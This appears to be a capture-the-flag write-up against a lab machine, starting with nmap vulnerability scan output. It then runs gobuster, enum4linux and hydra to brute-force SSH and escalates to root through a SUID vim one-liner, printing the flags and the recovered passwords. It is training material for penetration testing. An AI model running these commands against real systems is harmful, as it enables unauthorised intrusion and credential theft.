|     	B41082A1-4177-53E2-A74C-8ABA13AA3E86	10.0	https://vulners.com/githubexploit/B41082A1-4177-53E2-A74C-8ABA13AA3E86	*EXPLOIT*
|     	TOMCAT:5FF617CEB667027ABB70FDFB3A8FFD4C	9.3	https://vulners.com/tomcat/TOMCAT:5FF617CEB667027ABB70FDFB3A8FFD4C
|     	SMNTC-107906	9.3	https://vulners.com/symantec/SMNTC-107906
|     	PACKETSTORM:153506	9.3	https://vulners.com/packetstorm/PACKETSTORM:153506	*EXPLOIT*
|     	MSF:EXPLOIT/WINDOWS/HTTP/TOMCAT_CGI_CMDLINEARGS	9.3	https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/HTTP/TOMCAT_CGI_CMDLINEARGS	*EXPLOIT*
|     	EDB-ID:47073	9.3	https://vulners.com/exploitdb/EDB-ID:47073	*EXPLOIT*
|     	DB8D8364-06FB-55E8-934E-C013B00821B5	9.3	https://vulners.com/githubexploit/DB8D8364-06FB-55E8-934E-C013B00821B5	*EXPLOIT*
|     	3A26C086-A741-585B-8FA9-F90780E2CA16	9.3	https://vulners.com/githubexploit/3A26C086-A741-585B-8FA9-F90780E2CA16	*EXPLOIT*
|     	1337DAY-ID-32925	9.3	https://vulners.com/zdt/1337DAY-ID-32925	*EXPLOIT*
|     	TOMCAT:BE665F9148D024F7474C0628515C3A37	7.5	https://vulners.com/tomcat/TOMCAT:BE665F9148D024F7474C0628515C3A37
|     	MSF:ILITIES/UBUNTU-CVE-2018-8014/	7.5	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-8014/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE_LINUX-CVE-2020-1938/	7.5	https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-1938/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1938/	7.5	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1938/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2020-1938/	7.5	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2020-1938/	*EXPLOIT*
|     	EDB-ID:49039	7.5	https://vulners.com/exploitdb/EDB-ID:49039	*EXPLOIT*
|     	CVE-2020-1938	7.5	https://vulners.com/cve/CVE-2020-1938
|     	CVE-2018-8014	7.5	https://vulners.com/cve/CVE-2018-8014
|     	C3759325-98F9-5F0F-98F5-6EAE787CE3FB	7.5	https://vulners.com/githubexploit/C3759325-98F9-5F0F-98F5-6EAE787CE3FB	*EXPLOIT*
|     	7130E91B-2DF2-565E-ADE8-4C60D45E5A4D	7.5	https://vulners.com/githubexploit/7130E91B-2DF2-565E-ADE8-4C60D45E5A4D	*EXPLOIT*
|     	6E0425A5-AA6D-5FC6-9F8C-415345C30DD5	7.5	https://vulners.com/githubexploit/6E0425A5-AA6D-5FC6-9F8C-415345C30DD5	*EXPLOIT*
|     	1638D72C-F3EB-52FB-B16F-5F1996A67C0A	7.5	https://vulners.com/githubexploit/1638D72C-F3EB-52FB-B16F-5F1996A67C0A	*EXPLOIT*
|     	140968B5-6F8E-57C6-8A61-831D5FB78836	7.5	https://vulners.com/githubexploit/140968B5-6F8E-57C6-8A61-831D5FB78836	*EXPLOIT*
|     	0B52DD25-4874-54EB-8213-8FA10B0966A3	7.5	https://vulners.com/githubexploit/0B52DD25-4874-54EB-8213-8FA10B0966A3	*EXPLOIT*
|     	TOMCAT:3535F2AFC77921EE4AD662129D83A68D	5.8	https://vulners.com/tomcat/TOMCAT:3535F2AFC77921EE4AD662129D83A68D
|     	CVE-2021-30640	5.8	https://vulners.com/cve/CVE-2021-30640
|     	CVE-2020-1935	5.8	https://vulners.com/cve/CVE-2020-1935
|     	TOMCAT:34D1BB5AAB77A4FA5A232BB1CC1DBE12	5.1	https://vulners.com/tomcat/TOMCAT:34D1BB5AAB77A4FA5A232BB1CC1DBE12
|     	MSF:ILITIES/ORACLE_LINUX-CVE-2019-17563/	5.1	https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2019-17563/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-17563/	5.1	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-17563/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2019-17563/	5.1	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-17563/	*EXPLOIT*
|     	CVE-2019-17563	5.1	https://vulners.com/cve/CVE-2019-17563
|     	TOMCAT:E0D7CC4566625A34425D5CE3D847746F	5.0	https://vulners.com/tomcat/TOMCAT:E0D7CC4566625A34425D5CE3D847746F
|     	TOMCAT:C878975BAAD7823EE793B63FC6053125	5.0	https://vulners.com/tomcat/TOMCAT:C878975BAAD7823EE793B63FC6053125
|     	TOMCAT:C3F367059A3E9B8636ED41FF901D93F9	5.0	https://vulners.com/tomcat/TOMCAT:C3F367059A3E9B8636ED41FF901D93F9
|     	TOMCAT:A0B0592E070D3A4A393867C40FBB81D8	5.0	https://vulners.com/tomcat/TOMCAT:A0B0592E070D3A4A393867C40FBB81D8
|     	TOMCAT:42FCCA1B939943E71978F85565FFC5D2	5.0	https://vulners.com/tomcat/TOMCAT:42FCCA1B939943E71978F85565FFC5D2
|     	TOMCAT:3C894B78CB6026265DCB4F6CBB52E528	5.0	https://vulners.com/tomcat/TOMCAT:3C894B78CB6026265DCB4F6CBB52E528
|     	TOMCAT:324E50A03961FCE2265C4097A2D9383A	5.0	https://vulners.com/tomcat/TOMCAT:324E50A03961FCE2265C4097A2D9383A
|     	TOMCAT:1ACD2AE0B03FBB401CCE27D5C801BE3B	5.0	https://vulners.com/tomcat/TOMCAT:1ACD2AE0B03FBB401CCE27D5C801BE3B
|     	TOMCAT:045D264F03959F4DF2D140C7A3C6A05B	5.0	https://vulners.com/tomcat/TOMCAT:045D264F03959F4DF2D140C7A3C6A05B
|     	TOMCAT:03526B264C3CCDD4C74F8B8FBF02E5E4	5.0	https://vulners.com/tomcat/TOMCAT:03526B264C3CCDD4C74F8B8FBF02E5E4
|     	SSV:99316	5.0	https://vulners.com/seebug/SSV:99316	*EXPLOIT*
|     	SMNTC-108874	5.0	https://vulners.com/symantec/SMNTC-108874
|     	MSF:ILITIES/UBUNTU-CVE-2018-8034/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-8034/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1336/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1336/	*EXPLOIT*
|     	CVE-2021-42340	5.0	https://vulners.com/cve/CVE-2021-42340
|     	CVE-2021-33037	5.0	https://vulners.com/cve/CVE-2021-33037
|     	CVE-2021-25122	5.0	https://vulners.com/cve/CVE-2021-25122
|     	CVE-2020-17527	5.0	https://vulners.com/cve/CVE-2020-17527
|     	CVE-2020-13935	5.0	https://vulners.com/cve/CVE-2020-13935
|     	CVE-2020-13934	5.0	https://vulners.com/cve/CVE-2020-13934
|     	CVE-2020-11996	5.0	https://vulners.com/cve/CVE-2020-11996
|     	CVE-2019-10072	5.0	https://vulners.com/cve/CVE-2019-10072
|     	CVE-2019-0199	5.0	https://vulners.com/cve/CVE-2019-0199
|     	CVE-2018-8034	5.0	https://vulners.com/cve/CVE-2018-8034
|     	CVE-2018-1336	5.0	https://vulners.com/cve/CVE-2018-1336
|     	18F5237C-DCAC-5831-AED6-F0880A11DFF2	5.0	https://vulners.com/githubexploit/18F5237C-DCAC-5831-AED6-F0880A11DFF2	*EXPLOIT*
|     	TOMCAT:F551C8E09F0122E8322CF8CB981AC710	4.4	https://vulners.com/tomcat/TOMCAT:F551C8E09F0122E8322CF8CB981AC710
|     	TOMCAT:A01991EC43D0F6A28E9CB4553C6B4670	4.4	https://vulners.com/tomcat/TOMCAT:A01991EC43D0F6A28E9CB4553C6B4670
|     	MSF:ILITIES/SUSE-CVE-2019-12418/	4.4	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-12418/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-12418/	4.4	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-12418/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-12418/	4.4	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-12418/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-12418/	4.4	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-12418/	*EXPLOIT*
|     	F60737C1-A24B-51C1-AE8D-73A65C778FFF	4.4	https://vulners.com/githubexploit/F60737C1-A24B-51C1-AE8D-73A65C778FFF	*EXPLOIT*
|     	E95D9A0E-E9DE-5D95-9879-E07C0257318C	4.4	https://vulners.com/githubexploit/E95D9A0E-E9DE-5D95-9879-E07C0257318C	*EXPLOIT*
|     	D5CBA0E2-A4B0-52CE-B93B-F433CE8662DA	4.4	https://vulners.com/githubexploit/D5CBA0E2-A4B0-52CE-B93B-F433CE8662DA	*EXPLOIT*
|     	CVE-2021-25329	4.4	https://vulners.com/cve/CVE-2021-25329
|     	CVE-2020-9484	4.4	https://vulners.com/cve/CVE-2020-9484
|     	CVE-2019-12418	4.4	https://vulners.com/cve/CVE-2019-12418
|     	C4EDB405-454C-5160-9A99-21A930740C3F	4.4	https://vulners.com/githubexploit/C4EDB405-454C-5160-9A99-21A930740C3F	*EXPLOIT*
|     	B0BA17F5-F171-5C97-9F6C-D5F38B5B64F5	4.4	https://vulners.com/githubexploit/B0BA17F5-F171-5C97-9F6C-D5F38B5B64F5	*EXPLOIT*
|     	743F51FB-8BF4-5425-AEFA-10B2A14C8F3B	4.4	https://vulners.com/githubexploit/743F51FB-8BF4-5425-AEFA-10B2A14C8F3B	*EXPLOIT*
|     	5602A60A-886A-598C-99B3-EE2E820506AD	4.4	https://vulners.com/githubexploit/5602A60A-886A-598C-99B3-EE2E820506AD	*EXPLOIT*
|     	504D019A-423C-50A0-9677-93192F0ECDFC	4.4	https://vulners.com/githubexploit/504D019A-423C-50A0-9677-93192F0ECDFC	*EXPLOIT*
|     	4278B435-D22E-57E8-ABC4-639BAAFA6FC9	4.4	https://vulners.com/githubexploit/4278B435-D22E-57E8-ABC4-639BAAFA6FC9	*EXPLOIT*
|     	14CD7401-C309-52B2-B4EE-AD54900F0455	4.4	https://vulners.com/githubexploit/14CD7401-C309-52B2-B4EE-AD54900F0455	*EXPLOIT*
|     	TOMCAT:6B8125EDA215F510A527D712FEF3FF0A	4.3	https://vulners.com/tomcat/TOMCAT:6B8125EDA215F510A527D712FEF3FF0A
|     	TOMCAT:1CE79F1FB24CB690F26B87530FB0DBF3	4.3	https://vulners.com/tomcat/TOMCAT:1CE79F1FB24CB690F26B87530FB0DBF3
|     	SMNTC-105524	4.3	https://vulners.com/symantec/SMNTC-105524
|     	PACKETSTORM:163457	4.3	https://vulners.com/packetstorm/PACKETSTORM:163457	*EXPLOIT*
|     	PACKETSTORM:163456	4.3	https://vulners.com/packetstorm/PACKETSTORM:163456	*EXPLOIT*
|     	MSF:ILITIES/JRE-VULN-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/JRE-VULN-CVE-2019-2684/	*EXPLOIT*
|     	MSF:ILITIES/IBM-JAVA-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/IBM-JAVA-CVE-2019-2684/	*EXPLOIT*
|     	MSF:ILITIES/IBM-AIX-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-2684/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-0221/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-0221/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-2684/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-2684/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-0221/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-0221/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-2684/	*EXPLOIT*
|     	MSF:ILITIES/GENTOO-LINUX-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-2684/	*EXPLOIT*
|     	MSF:ILITIES/GENTOO-LINUX-CVE-2019-0221/	4.3	https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-0221/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-2684/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-2684/	4.3	https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-2684/	*EXPLOIT*
|     	EDB-ID:50119	4.3	https://vulners.com/exploitdb/EDB-ID:50119	*EXPLOIT*
|     	EDB-ID:50118	4.3	https://vulners.com/exploitdb/EDB-ID:50118	*EXPLOIT*
|     	CVE-2021-41079	4.3	https://vulners.com/cve/CVE-2021-41079
|     	CVE-2021-24122	4.3	https://vulners.com/cve/CVE-2021-24122
|     	CVE-2019-0221	4.3	https://vulners.com/cve/CVE-2019-0221
|     	CVE-2018-8037	4.3	https://vulners.com/cve/CVE-2018-8037
|     	CVE-2018-11784	4.3	https://vulners.com/cve/CVE-2018-11784
|     	1337DAY-ID-36546	4.3	https://vulners.com/zdt/1337DAY-ID-36546	*EXPLOIT*
|     	1337DAY-ID-36545	4.3	https://vulners.com/zdt/1337DAY-ID-36545	*EXPLOIT*
|     	TOMCAT:909935A4BEB7C54CD1FA804D13CDD890	4.0	https://vulners.com/tomcat/TOMCAT:909935A4BEB7C54CD1FA804D13CDD890
|     	CVE-2020-13943	4.0	https://vulners.com/cve/CVE-2020-13943
|     	SMNTC-111247	0.0	https://vulners.com/symantec/SMNTC-111247
|_    	SMNTC-111245	0.0	https://vulners.com/symantec/SMNTC-111245
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/4%OT=22%CT=1%CU=34280%PV=Y%DS=4%DC=T%G=Y%TM=618494C
OS:8%P=aarch64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS
OS:=8)OPS(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M
OS:506ST11NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68
OS:DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)

Uptime guess: 0.019 days (since Thu Nov  4 19:52:32 2021)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   30.62 ms  10.13.0.1
2   ... 3
4   172.85 ms 10.10.74.250

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov  4 20:19:52 2021 -- 1 IP address (1 host up) scanned in 1390.99 seconds

Available services:

The server looks to be running Ubuntu.

Going to http://10.10.74.250:80 revels a generic “maintenance” page, but there’s a note to “[c]heck our dev note section if you need to know what to work on.”

Going to http://10.10.74.250:8080 reveals what looks like the generic first-run Tomcat page. Poking around there doesn’t reveal any obvious modifications.

Flag 1

Let’s hit http://10.10.74.250:80 with gobuster and see what we find!

gobuster dir \
	-u http://10.10.74.250 \
	-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

It looks like there’s a “hidden” directory http://10.10.74.250/development/.

FLAG 1: development

Flags 2, 3, 4, and 5

http://10.10.74.250/development/ contains two files.

http://10.10.74.250/development/dev.txt:

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

Okay, so we’ve got two users, “J” and “K”, and an example REST app of some kind (using Apache Struts?) with version 2.5.12.

http://10.10.74.250/development/j.txt:

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Seems like J has a weak password.

From a quick check of the hydra man page, it looks like we can feed it a list of usernames with the -L option. I’m going to make a couple assumptions:

A couple of quick searches on DuckDuckGo landed me on this list of common usernames; I’m going to filter that down to just the Js and then feed it + rockyou.txt into Hydra.

hydra -t 4 -L j.txt -P rockyou.txt -vV 10.10.74.250 ssh

Except… That’s going to take forever. The hint suggests looking at Samba to find usernames, which is a good reminder.

I thought I had some notes about how to do this, but it looks like I don’t. But a little bit of search brings me to “Nmap SMB Scripts and SMB Enumeration Step-By-Step Pentesting Guide”. To nmap again!

nmap -vv -oA basic-pentesting-enumerate-smb -sT \
     --script smb-enum-users.nse -p445 10.10.74.250

But this doesn’t return any results (maybe it’s Windows-specific?).

A bit more internet searching and I arrive at “Enumerate SMB with Enum4linux & Smbclient”, which suggests using enum4linux.

enum4linux -U 10.10.74.250

But this errors out on me before outputting any useful information. (It did list a user named krbtgt, but after getting excited and thinking this might be “K” I realized that this looked like it might be related to Kerberos… And a brief internet search confirmed this.)

Trying to use the Metasploit module auxiliary/smb/smb_lookupsid as suggested in “A Little Guide to SMB Enumeration” just resulted in an error about the server not being “able to handle the encrypted request.”

Switching back to trying to get enum4linux to work, I tried calling it without the -U flag. This does a full enumeration, and in particular tries to “brute-force” usernames by guessing SIDs. This worked! (I still got the same error, but the enumeration continued…) We have two users, kay and jan.

Let’s turn back to Hydra, but now using the username of jan. I’m also going to try a shorter wordlist, because rockyou.txt is ridiculously long.

hydra -t 4 -l jan -P /usr/share/wordlists/nmap.lst \
      -vV 10.10.74.250 ssh

And we’ve got a match – jan’s password is armando.

And… We’re in!

env -u SSH_AUTH_SOCK -u SSH_AGENT_PID \
	ssh jan@10.10.74.250

FLAG 2: jan

FLAG 3: armando

FLAG 4: SSH

FLAG 5: kay

Flag 6

Now that we’re in, let’s see if we can escalate privileges.

Jan’s home directory is a little weird… It contains a single file (~/.lesshst), and is owned by root!

Home directories are world-readable, so we can see what’s in kay’s. It looks more normal… But also contains a file called pass.bak, which looks like it might be our last flag (“the final password”). Unfortunately, it’s not world-readable, and neither are any of kay’s history files.

Does jan have sudo privileges? Running sudo -l suggests not.

Let’s see if there are any interesting binaries on the system that jan both has access to and I could potentially abuse.

find / -type f \
       -a \( -perm -u+s -o -perm -g+s \) \
       -exec ls -l {} \; 2> /dev/null

And… /usr/bin/vim.basic is SUID root?!? GTFOBins suggests that this can lead to a privilege escalation if ViM is compiled with Python… And, indeed, running vim.basic --version reveals that this is the case.

Adapting the escape from GTFOBins for the present case gives us:

vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

And this indeed gives us root! With this new power, we can enter kay’s home directory and read pass.bak for our final flag.

FLAG 6: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

ELAPSED TIME: 3 h 19 min